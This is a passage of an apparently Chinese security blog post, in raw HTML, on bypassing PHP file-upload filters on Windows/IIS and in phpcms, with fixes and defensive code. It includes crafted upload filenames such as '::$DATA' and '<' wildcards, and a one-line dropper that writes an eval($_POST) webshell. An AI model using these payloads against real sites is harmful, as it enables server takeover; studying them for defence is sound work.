class="string">&quot;/[^\w]/i&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="variable">$filename</span>);  <span class="comment">//过滤除了a-zA-Z0-9以外的内容</span></span><br><span class="line">    <span class="variable">$upfile</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>];    <span class="comment">//file中name</span></span><br><span class="line">    <span class="variable">$upfile</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;;&#x27;</span>,<span class="string">&quot;&quot;</span>,<span class="variable">$upfile</span>);   <span class="comment">//过滤; 防止截断</span></span><br><span class="line">    <span class="variable">$upfile</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="string">&quot;/[^(\w|\:|\$|\.|\&lt;|\&gt;)]/i&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="variable">$upfile</span>);   <span class="comment">//只能出现a-zA-Z0-9:$.&lt;&gt;</span></span><br><span class="line">    <span class="variable">$tempfile</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>];</span><br><span class="line">    <span class="variable">$ext</span> = <span class="title function_ invoke__">trim</span>(<span class="title function_ invoke__">get_extension</span>(<span class="variable">$upfile</span>)); </span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">in_array</span>(<span class="variable">$ext</span>,<span class="keyword">array</span>(<span class="string">&#x27;php&#x27;</span>,<span class="string">&#x27;php3&#x27;</span>,<span class="string">&#x27;php5&#x27;</span>)))&#123;   <span class="comment">//过滤php35</span></span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;Warning ! File type error..&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$ext</span> == <span class="string">&#x27;asp&#x27;</span> <span class="keyword">or</span> <span class="variable">$ext</span> == <span class="string">&#x27;asa&#x27;</span> <span class="keyword">or</span> <span class="variable">$ext</span> == <span class="string">&#x27;cer&#x27;</span> <span class="keyword">or</span> <span class="variable">$ext</span> == <span class="string">&#x27;cdx&#x27;</span> <span class="keyword">or</span> <span class="variable">$ext</span> == <span class="string">&#x27;aspx&#x27;</span> <span class="keyword">or</span> <span class="variable">$ext</span> == <span class="string">&#x27;htaccess&#x27;</span>) <span class="variable">$ext</span> = <span class="string">&#x27;file&#x27;</span>;</span><br><span class="line">  <span class="comment">//$savefile = &#x27;upload/&#x27;.$upfile;</span></span><br><span class="line">    <span class="variable">$savefile</span> = <span class="string">&#x27;upload/&#x27;</span>.<span class="variable">$filename</span>.<span class="string">&quot;.&quot;</span>.<span class="variable">$ext</span>;</span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$tempfile</span>,<span class="variable">$savefile</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;Success upload..path :&#x27;</span>.<span class="variable">$savefile</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;Upload failed..&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_extension</span>(<span class="params"><span class="variable">$file</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="title function_ invoke__">strtolower</span>(<span class="title function_ invoke__">substr</span>(<span class="variable">$file</span>, <span class="title function_ invoke__">strrpos</span>(<span class="variable">$file</span>, <span class="string">&#x27;.&#x27;</span>)+<span class="number">1</span>));</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line">&lt;html&gt;</span><br><span class="line"> &lt;body&gt;</span><br><span class="line">  &lt;form method=<span class="string">&quot;post&quot;</span> action=<span class="string">&quot;upfile.php&quot;</span> enctype=<span class="string">&quot;multipart/form-data&quot;</span>&gt;</span><br><span class="line">   &lt;input type=<span class="string">&quot;file&quot;</span> name=<span class="string">&quot;file&quot;</span> value=<span class="string">&quot;&quot;</span>/&gt;</span><br><span class="line">   &lt;input type=<span class="string">&quot;hidden&quot;</span> name=<span class="string">&quot;filename&quot;</span> value=<span class="string">&quot;file&quot;</span>/&gt;</span><br><span class="line">   &lt;input type=<span class="string">&quot;submit&quot;</span> name=<span class="string">&quot;submit&quot;</span> value=<span class="string">&quot;upload&quot;</span>/&gt;</span><br><span class="line">  &lt;/form&gt;</span><br><span class="line"> &lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
<p>前置知识 1.</p>
<p>php 可以使用 <code>%00</code>  截断，也可以使用 <code>:</code>  截断，但：截断后文件内容是空的</p>
<p>(我看人家说用 #? 这两个字符也能截断… 我觉得不太对)</p>
<p>前置知识 2.</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="title class_">Windows</span>+<span class="variable constant_">IIS</span>+<span class="variable constant_">PHP</span>下</span><br><span class="line">双引号(<span class="string">&quot;“&quot;</span>) &lt;==&gt; 点号(<span class="string">&quot;.&quot;</span>)<span class="string">&#x27;;</span></span><br><span class="line"><span class="string">大于符号(&quot;&gt;&quot;) &lt;==&gt; 问号(&quot;?&quot;)&#x27;</span>;</span><br><span class="line">小于符号(<span class="string">&quot;&lt;&quot;</span>) &lt;==&gt; 星号(<span class="string">&quot;*&quot;</span>)<span class="string">&#x27;;</span></span><br><span class="line"><span class="string">上述是等价的，但*又可以做通配符使用，因此我们可以使用&lt;作为通配符</span></span><br></pre></td></tr></table></figure>
<h3 id="利用覆盖生成文件"><a class="markdownIt-Anchor" href="#利用覆盖生成文件">#</a> 利用：覆盖生成文件</h3>
<p>先安装 IIS 和对应的管理工具</p>
<p>1) 首先利用冒号生成我们将要覆盖的 php 文件，这里为：bypass.php，抓包将其改为 bypass.php:jpg</p>
<p>此时会覆盖文件，文件上传后的文件名为 bypass.php，大小为 0kb</p>
<p>2) 利用上面的系统特性覆盖该文件</p>
<p>从上面已经知道 &quot;&lt;&quot; 就等于 “ <code>*</code> ”, 而 &quot; <code>*</code> &quot; 代码任意字符，于是乎… 我们可以这样修改上传的文件名</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">------<span class="title class_">WebKitFormBoundaryaaRARrn2LBvpvcwK</span></span><br><span class="line"></span><br><span class="line"><span class="title class_">Content</span>-<span class="title class_">Disposition</span>: form-data; name=<span class="string">&quot;file&quot;</span>; filename=<span class="string">&quot;bypass.&lt;&lt;&lt;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="title class_">Content</span>-<span class="title class_">Type</span>: image/jpeg</span><br></pre></td></tr></table></figure>
<p>此时即可覆盖 bypass.php，同时文件内容被成功写了进去，后面就可以在内容中写 php 代码</p>
<h3 id="通过默认数据流上传php文件"><a class="markdownIt-Anchor" href="#通过默认数据流上传php文件">#</a> 通过默认数据流上传 php 文件</h3>
<p>抓包，修改文件名，在结尾添加::$DATA</p>
<p>The default data stream has no name. That is, the fully qualified name for the default stream for a file called “sample.txt” is “sample.txt::<span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>D</mi><mi>A</mi><mi>T</mi><mi>A</mi><mi mathvariant="normal">&quot;</mi><mi>s</mi><mi>i</mi><mi>n</mi><mi>c</mi><mi>e</mi><mi mathvariant="normal">&quot;</mi><mi>s</mi><mi>a</mi><mi>m</mi><mi>p</mi><mi>l</mi><mi>e</mi><mi mathvariant="normal">.</mi><mi>t</mi><mi>x</mi><mi>t</mi><mi mathvariant="normal">&quot;</mi><mi>i</mi><mi>s</mi><mi>t</mi><mi>h</mi><mi>e</mi><mi>n</mi><mi>a</mi><mi>m</mi><mi>e</mi><mi>o</mi><mi>f</mi><mi>t</mi><mi>h</mi><mi>e</mi><mi>f</mi><mi>i</mi><mi>l</mi><mi>e</mi><mi>a</mi><mi>n</mi><mi>d</mi><mi mathvariant="normal">&quot;</mi></mrow><annotation encoding="application/x-tex">DATA&quot; since &quot;sample.txt&quot; is the name of the file and &quot;</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8888799999999999em;vertical-align:-0.19444em;"></span><span class="mord mathnormal" style="margin-right:0.02778em;">D</span><span class="mord mathnormal">A</span><span class="mord mathnormal" style="margin-right:0.13889em;">T</span><span class="mord mathnormal">A</span><span class="mord">&quot;</span><span class="mord mathnormal">s</span><span class="mord mathnormal">i</span><span class="mord mathnormal">n</span><span class="mord mathnormal">c</span><span class="mord mathnormal">e</span><span class="mord">&quot;</span><span class="mord mathnormal">s</span><span class="mord mathnormal">a</span><span class="mord mathnormal">m</span><span class="mord mathnormal">p</span><span class="mord mathnormal" style="margin-right:0.01968em;">l</span><span class="mord mathnormal">e</span><span class="mord">.</span><span class="mord mathnormal">t</span><span class="mord mathnormal">x</span><span class="mord mathnormal">t</span><span class="mord">&quot;</span><span class="mord mathnormal">i</span><span class="mord mathnormal">s</span><span class="mord mathnormal">t</span><span class="mord mathnormal">h</span><span class="mord mathnormal">e</span><span class="mord mathnormal">n</span><span class="mord mathnormal">a</span><span class="mord mathnormal">m</span><span class="mord mathnormal">e</span><span class="mord mathnormal">o</span><span class="mord mathnormal" style="margin-right:0.10764em;">f</span><span class="mord mathnormal">t</span><span class="mord mathnormal">h</span><span class="mord mathnormal">e</span><span class="mord mathnormal" style="margin-right:0.10764em;">f</span><span class="mord mathnormal">i</span><span class="mord mathnormal" style="margin-right:0.01968em;">l</span><span class="mord mathnormal">e</span><span class="mord mathnormal">a</span><span class="mord mathnormal">n</span><span class="mord mathnormal">d</span><span class="mord">&quot;</span></span></span></span>DATA” is the stream type</p>
<p>默认数据流没有名称。也就是说，名为 “sample.txt” 的文件的默认流的完全限定名是 “sample.txt:：<span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>D</mi><mi>A</mi><mi>T</mi><mi>A</mi><mtext>”，因为“</mtext><mi>s</mi><mi>a</mi><mi>m</mi><mi>p</mi><mi>l</mi><mi>e</mi><mi mathvariant="normal">.</mi><mi>t</mi><mi>x</mi><mi>t</mi><mtext>”是文件名，“</mtext></mrow><annotation encoding="application/x-tex">DATA”，因为“sample.txt”是文件名，“</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8888799999999999em;vertical-align:-0.19444em;"></span><span class="mord mathnormal" style="margin-right:0.02778em;">D</span><span class="mord mathnormal">A</span><span class="mord mathnormal" style="margin-right:0.13889em;">T</span><span class="mord mathnormal">A</span><span class="mord">”</span><span class="mord cjk_fallback">，</span><span class="mord cjk_fallback">因</span><span class="mord cjk_fallback">为</span><span class="mord">“</span><span class="mord mathnormal">s</span><span class="mord mathnormal">a</span><span class="mord mathnormal">m</span><span class="mord mathnormal">p</span><span class="mord mathnormal" style="margin-right:0.01968em;">l</span><span class="mord mathnormal">e</span><span class="mord">.</span><span class="mord mathnormal">t</span><span class="mord mathnormal">x</span><span class="mord mathnormal">t</span><span class="mord">”</span><span class="mord cjk_fallback">是</span><span class="mord cjk_fallback">文</span><span class="mord cjk_fallback">件</span><span class="mord cjk_fallback">名</span><span class="mord cjk_fallback">，</span><span class="mord">“</span></span></span></span>DATA” 是流类型</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">------<span class="title class_">WebKitFormBoundaryaaRARrn2LBvpvcwK</span></span><br><span class="line"></span><br><span class="line"><span class="title class_">Content</span>-<span class="title class_">Disposition</span>: form-data; name=<span class="string">&quot;file&quot;</span>; filename=<span class="string">&#x27;DataStreamTest.php::$DATA&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="title class_">Content</span>-<span class="title class_">Type</span>: image/jpeg</span><br></pre></td></tr></table></figure>
<p>成功上传后缀为 php 的文件</p>
<h2 id="phpcms文件上传四次绕过"><a class="markdownIt-Anchor" href="#phpcms文件上传四次绕过">#</a> phpcms 文件上传四次绕过</h2>
<p>1. 只能上传压缩文件，上传后解压，判断文件后缀，删除非法文件</p>
<p>没有递归删除文件，导致可以构造文件夹，文件夹中放非法文件</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">function check_dir($<span class="built_in">dir</span>)&#123;</span><br><span class="line">    $handle = opendir($<span class="built_in">dir</span>);</span><br><span class="line">    <span class="keyword">while</span>(($f = readdir($handle)) !== false)&#123;</span><br><span class="line">        <span class="keyword">if</span>(!in_array($f, array(<span class="string">&#x27;.&#x27;</span>, <span class="string">&#x27;..&#x27;</span>)))&#123;</span><br><span class="line">            $ext = strtolower(substr(strrchr($f, <span class="string">&#x27;.&#x27;</span>), <span class="number">1</span>));</span><br><span class="line">            <span class="keyword">if</span>(!in_array($ext, array(<span class="string">&#x27;jpg&#x27;</span>, <span class="string">&#x27;gif&#x27;</span>, <span class="string">&#x27;png&#x27;</span>)))&#123;</span><br><span class="line">                unlink($<span class="built_in">dir</span>.$f);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>修复：递归删除</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//递归删除</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check_dir</span>(<span class="params"><span class="variable">$dir</span></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$handle</span> = <span class="title function_ invoke__">opendir</span>(<span class="variable">$dir</span>);</span><br><span class="line">    <span class="keyword">while</span>((<span class="variable">$f</span> = <span class="title function_ invoke__">readdir</span>(<span class="variable">$handle</span>)) !== <span class="literal">false</span>)&#123;</span><br><span class="line">        <span class="keyword">if</span>(!<span class="title function_ invoke__">in_array</span>(<span class="variable">$f</span>, <span class="keyword">array</span>(<span class="string">&#x27;.&#x27;</span>, <span class="string">&#x27;..&#x27;</span>)))&#123;</span><br><span class="line">            <span class="keyword">if</span>(<span class="title function_ invoke__">is_dir</span>(<span class="variable">$dir</span>.<span class="variable">$f</span>))&#123;</span><br><span class="line">                <span class="title function_ invoke__">check_dir</span>(<span class="variable">$dir</span>.<span class="variable">$f</span>.<span class="string">&#x27;/&#x27;</span>);</span><br><span class="line">             &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">                <span class="variable">$ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="title function_ invoke__">substr</span>(<span class="title function_ invoke__">strrchr</span>(<span class="variable">$f</span>, <span class="string">&#x27;.&#x27;</span>), <span class="number">1</span>));</span><br><span class="line">                <span class="keyword">if</span>(!<span class="title function_ invoke__">in_array</span>(<span class="variable">$ext</span>, <span class="keyword">array</span>(<span class="string">&#x27;jpg&#x27;</span>, <span class="string">&#x27;gif&#x27;</span>, <span class="string">&#x27;png&#x27;</span>)))&#123;</span><br><span class="line">                    <span class="title function_ invoke__">unlink</span>(<span class="variable">$dir</span>.<span class="variable">$f</span>);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>2. 先解压再删除，条件竞争，通过上传后没有删除的短暂时间内访问该文件，在该文将上一级目录写马</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(in_array($ext, array(<span class="string">&#x27;zip&#x27;</span>, <span class="string">&#x27;jpg&#x27;</span>, <span class="string">&#x27;gif&#x27;</span>, <span class="string">&#x27;png&#x27;</span>)))&#123;</span><br><span class="line">    <span class="keyword">if</span>($ext == <span class="string">&#x27;zip&#x27;</span>)&#123;</span><br><span class="line">        $archive = new PclZip($file[<span class="string">&#x27;tmp_name&#x27;</span>]);</span><br><span class="line">        <span class="keyword">if</span> ($archive-&gt;extract(PCLZIP_OPT_PATH, $temp_dir, PCLZIP_OPT_REPLACE_NEWER) == <span class="number">0</span>) &#123;</span><br><span class="line">               exit(<span class="string">&quot;解压失败&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        check_dir($<span class="built_in">dir</span>);</span><br><span class="line">        exit(<span class="string">&#x27;上传成功!&#x27;</span>);</span><br></pre></td></tr></table></figure>
<p>通过 BP 一边一直上传，一边一直访问上传文件，上传的文件使用 fputs 在上级写马</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php fputs(fopen(<span class="string">&#x27;../../../../../shell.php&#x27;</span>,<span class="string">&#x27;w&#x27;</span>),<span class="string">&#x27;&lt;?php phpinfo();eval($_POST[a]);?&gt;&#x27;</span>);?&gt;</span><br></pre></td></tr></table></figure>
<p>修复：通过上传文件夹名为随机文件名来禁止访问</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(!is_dir($<span class="built_in">dir</span>))&#123;</span><br><span class="line">    mkdir($<span class="built_in">dir</span>);</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">$temp_dir = $<span class="built_in">dir</span>.md5(time(). rand(<span class="number">1000</span>,<span class="number">9999</span>));</span><br><span class="line">$temp_dir = $<span class="built_in">dir</span>.<span class="string">&#x27;member/1/&#x27;</span>;</span><br><span class="line"><span class="keyword">if</span>(!is_dir($temp_dir))&#123;</span><br></pre></td></tr></table></figure>
<p>3. 通过解压失败直接退出绕过。构造可以解压一半的压缩包，把木马解压后再失败退出。目录通过右键查看图片链接获得</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ($archive-&gt;extract(PCLZIP_OPT_PATH, $temp_dir, PCLZIP_OPT_REPLACE_NEWER) == <span class="number">0</span>) &#123;</span><br><span class="line">       exit(<span class="string">&quot;解压失败&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>修复：退出之前递归删除</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ($archive-&gt;extract(PCLZIP_OPT_PATH, $temp_dir, PCLZIP_OPT_REPLACE_NEWER) == <span class="number">0</span>) &#123;</span><br><span class="line">       check_dir($<span class="built_in">dir</span>);</span><br><span class="line">       exit(<span class="string">&quot;解压失败&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这边详细讲一下怎么构造只能解压一部分的压缩包</p>
<ol>
<li>使用 Windows 下的 7zip</li>
</ol>
<p>修改压缩包里文件的 CRC 校验码</p>
<p>先准备两个文件，一个 PHP 文件 1.php，一个文本文件 2.txt，其中 1.php 是 webshell。然后将这两个文件压缩成 shell.zip。 然后我们用 010editor 打开 shell.zip，可以看到右下角有这个文件的格式信息，它被分成 5 部分，如图 1。我们打开第 4 部分，其中有个 deCrc，我们随便把值改成其他的值，然后保存。</p>
<ol start="2">
<li>使用 PHP 自带的 ZipArchive 库</li>
</ol>
<p>Windows 下不允许文件名中包含冒号（:），我们就可以在 010editor 中将 2.txt 的 deFileName 属性的值改成 “2.tx:”</p>
<p>在 Linux 下也有类似的方法，我们可以将文件名改成 5 个斜杠（/////）</p>
<p>4. 把压缩包中某文件名改成…/…/…/…/…/index.php，解压后文件直接到网站根目录</p>
<p>注意修改文件名后文件名长度不变</p>
<p>5. 通过验证文件名中不包含 <code>../</code>  并且文件名需要为 jpg</p>
<p>通过构造 1.php;1.jpg</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">foreach ($content <span class="keyword">as</span> $t) &#123;</span><br><span class="line">            <span class="keyword">if</span> (strpos($t[<span class="string">&#x27;stored_filename&#x27;</span>], <span class="string">&#x27;..&#x27;</span>) !== FALSE ||</span><br><span class="line">                strpos($t[<span class="string">&#x27;filename&#x27;</span>], <span class="string">&#x27;..&#x27;</span>) !== FALSE ||</span><br><span class="line">                strpos($t[<span class="string">&#x27;filename&#x27;</span>], <span class="string">&#x27;/&#x27;</span>) !== FALSE ||</span><br><span class="line">                strpos($t[<span class="string">&#x27;stored_filename&#x27;</span>], <span class="string">&#x27;/&#x27;</span>) !== FALSE) &#123;</span><br><span class="line"><span class="meta">                @unlink(<span class="params">$filename</span>);</span></span><br><span class="line">                exit(function_exists(<span class="string">&#x27;iconv&#x27;</span>) ? iconv(<span class="string">&#x27;UTF-8&#x27;</span>, <span class="string">&#x27;GBK&#x27;</span>, <span class="string">&#x27;非法名称的文件&#x27;</span>) : <span class="string">&#x27;llegal name file&#x27;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span> (substr(strrchr($t[<span class="string">&#x27;stored_filename&#x27;</span>], <span class="string">&#x27;.&#x27;</span>), <span class="number">1</span>) != <span class="string">&#x27;jpg&#x27;</span>) &#123;</span><br><span class="line"><span class="meta">                @unlink(<span class="params">$filename</span>);</span></span><br><span class="line">                exit(function_exists(<span class="string">&#x27;iconv&#x27;</span>) ? iconv(<span class="string">&#x27;UTF-8&#x27;</span>, <span class="string">&#x27;GBK&#x27;</span>, <span class="string">&#x27;文件格式校验不正确&#x27;</span>) : <span class="string">&#x27;The document format verification is not correct&#x27;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>
<p>6. 正确的防御方法：<br>
把压缩包放进 tmp 目录里，如果上传、解压缩的操作都能在 tmp 目录里完成，再把我们需要的头像文件拷贝到 web 目录中</p>
<p>7. 附上最后一版的防御代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">upload</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="comment">// 大众版头像上传处理 2014-6-15</span></span><br><span class="line">        <span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$GLOBALS</span>[<span class="string">&#x27;HTTP_RAW_POST_DATA&#x27;</span>])) &#123;</span><br><span class="line">            <span class="keyword">exit</span>(<span class="title function_ invoke__">function_exists</span>(<span class="string">&#x27;iconv&#x27;</span>) ? <span class="title function_ invoke__">iconv</span>(<span class="string">&#x27;UTF-8&#x27;</span>, <span class="string">&#x27;GBK&#x27;</span>, <span class="string">&#x27;环境不支持&#x27;</span>) : <span class="string">&#x27;The php does not support&#x27;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 创建图片存储文件夹</span></span><br><span class="line">        <span class="variable">$dir</span> = FCPATH.<span class="string">&#x27;member/uploadfile/member/&#x27;</span>.<span class="variable language_">$this</span>-&gt;uid.<span class="string">&#x27;/&#x27;</span>;</span><br><span class="line">        <span class="keyword">if</span> (!<span class="title function_ invoke__">file_exists</span>(<span class="variable">$dir</span>)) &#123;</span><br><span class="line">            <span class="title function_ invoke__">mkdir</span>(<span class="variable">$dir</span>, <span class="number">0777</span>, <span class="literal">true</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="variable">$filename</span> = <span class="variable">$dir</span>.<span class="string">&#x27;avatar.zip&#x27;</span>; <span class="comment">// 存储flashpost图片</span></span><br><span class="line">        <span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$filename</span>, <span class="variable">$GLOBALS</span>[<span class="string">&#x27;HTTP_RAW_POST_DATA&#x27;</span>]);</span><br><span class="line">        <span class="comment">// 解压缩文件</span></span><br><span class="line">        <span class="variable language_">$this</span>-&gt;load-&gt;<span class="title function_ invoke__">library</span>(<span class="string">&#x27;Pclzip&#x27;</span>);</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;pclzip-&gt;<span class="title function_ invoke__">PclFile</span>(<span class="variable">$filename</span>);</span><br><span class="line">        <span class="variable">$content</span> = <span class="variable language_">$this</span>-&gt;pclzip-&gt;<span class="title function_ invoke__">listContent</span>();</span><br><span class="line">        <span class="keyword">if</span> (!<span class="variable">$content</span>) &#123;</span><br><span class="line">            @<span class="title function_ invoke__">unlink</span>(<span class="variable">$filename</span>);</span><br><span class="line">            <span class="keyword">exit</span>(<span class="title function_ invoke__">function_exists</span>(<span class="string">&#x27;iconv&#x27;</span>) ? <span class="title function_ invoke__">iconv</span>(<span class="string">&#x27;UTF-8&#x27;</span>, <span class="string">&#x27;GBK&#x27;</span>, <span class="string">&#x27;文件已损坏&#x27;</span>) : <span class="string">&#x27;The file has damaged&#x27;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 验证文件</span></span><br><span class="line">        <span class="keyword">foreach</span> (<span class="variable">$content</span> <span class="keyword">as</span> <span class="variable">$t</span>) &#123;</span><br><span class="line">            <span class="keyword">if</span> (<span class="title function_ invoke__">strpos</span>(<span class="variable">$t</span>[<span class="string">&#x27;stored_filename&#x27;</span>], <span class="string">&#x27;..&#x27;</span>) !== <span class="literal">FALSE</span> ||</span><br><span class="line">                <span class="title function_ invoke__">strpos</span>(<span class="variable">$t</span>[<span class="string">&#x27;filename&#x27;</span>], <span class="string">&#x27;..&#x27;</span>) !== <span class="literal">FALSE</span> ||</span><br><span class="line">                <span class="title function_ invoke__">strpos</span>(<span class="variable">$t</span>[<span class="string">&#x27;filename&#x27;</span>], <span class="string">&#x27;/&#x27;</span>) !== <span class="literal">FALSE</span> ||</span><br><span class="line">                <span class="title function_ invoke__">strpos</span>(<span class="variable">$t</span>[<span class="string">&#x27;stored_filename&#x27;</span>], <span class="string">&#x27;/&#x27;</span>) !== <span class="literal">FALSE</span>) &#123;</span><br><span class="line">                @<span class="title function_ invoke__">unlink</span>(<span class="variable">$filename</span>);</span><br><span class="line">                <span class="keyword">exit</span>(<span class="title function_ invoke__">function_exists</span>(<span class="string">&#x27;iconv&#x27;</span>) ? <span class="title function_ invoke__">iconv</span>(<span class="string">&#x27;UTF-8&#x27;</span>, <span class="string">&#x27;GBK&#x27;</span>, <span class="string">&#x27;非法名称的文件&#x27;</span>) : <span class="string">&#x27;llegal name file&#x27;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span> (<span class="title function_ invoke__">substr</span>(<span class="title function_ invoke__">strrchr</span>(<span class="variable">$t</span>[<span class="string">&#x27;stored_filename&#x27;</span>], <span class="string">&#x27;.&#x27;</span>), <span class="number">1</span>) != <span class="string">&#x27;jpg&#x27;</span>) &#123;</span><br><span class="line">                @<span class="title function_ invoke__">unlink</span>(<span class="variable">$filename</span>);</span><br><span class="line">                <span class="keyword">exit</span>(<span class="title function_ invoke__">function_exists</span>(<span class="string">&#x27;iconv&#x27;</span>) ? <span class="title function_ invoke__">iconv</span>(<span class="string">&#x27;UTF-8&#x27;</span>, <span class="string">&#x27;GBK&#x27;</span>, <span class="string">&#x27;文件格式校验不正确&#x27;</span>) : <span class="string">&#x27;The document format verification is not correct&#x27;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        